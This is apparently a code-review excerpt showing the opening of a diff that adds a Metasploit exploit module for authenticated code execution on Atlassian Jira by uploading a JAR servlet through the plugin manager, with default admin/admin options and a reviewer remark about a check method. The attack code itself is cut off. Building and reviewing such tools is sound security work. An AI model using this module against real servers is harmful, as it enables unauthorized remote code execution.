modules/exploits/multi/http/jira_plugin_upload.rb

```diff
@@ -0,0 +1,230 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::EXE
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'        => 'Atlassian Jira Authenticated Upload Code Execution',
+      'Description' => %q{
+        This module can be used to execute a payload on Atlassian Jira via
+        the Universal Plugin Manager(UPM). The module requires valid login
+        credentials to an account that has access to the plugin manager.
+        The payload is uploaded as a JAR archive containing a servlet using
+        a POST request against the UPM component. The check command will
+        test the validity of user supplied credentials and test for access
+        to the plugin manager.
+      },
+      'Author'      => 'Alexander Gonzalez(dubfr33)',
+      'License'     => MSF_LICENSE,
+      'References'  =>
+        [
+          ['URL', 'https://developer.atlassian.com/server/framework/atlassian-sdk/install-the-atlassian-sdk-on-a-windows-system/'],
+          ['URL', 'https://developer.atlassian.com/server/framework/atlassian-sdk/install-the-atlassian-sdk-on-a-linux-or-mac-system/'],
+          ['URL', 'https://developer.atlassian.com/server/framework/atlassian-sdk/create-a-helloworld-plugin-project/']
+        ],
+      'Platform'    => %w[java],
+      'Targets'     =>
+        [
+          ['Java Universal',
+            {
+              'Arch'     => ARCH_JAVA,
+              'Platform' => 'java'
+            }
+          ]
+        ],
+      'DisclosureDate' => 'Feb 22 2018'))
+
+    register_options(
+      [
+        Opt::RPORT(2990),
+        OptString.new('HttpUsername', [true, 'The username to authenticate as', 'admin']),
+        OptString.new('HttpPassword', [true, 'The password for the specified username', 'admin']),
+        OptString.new('TARGETURI', [true, 'The base URI to Jira', '/jira/'])
+      ])
+  end
+
+  def check
+    unless access_login?
+      vprint_error('Unable to access the web application!')
+      return CheckCode::Unknown
+    end
+    auth_res = do_auth
+    good_sid = get_sid(auth_res)
```

Comment:
This method contains a `fail_with` call, which generally is not permitted inside `check` method.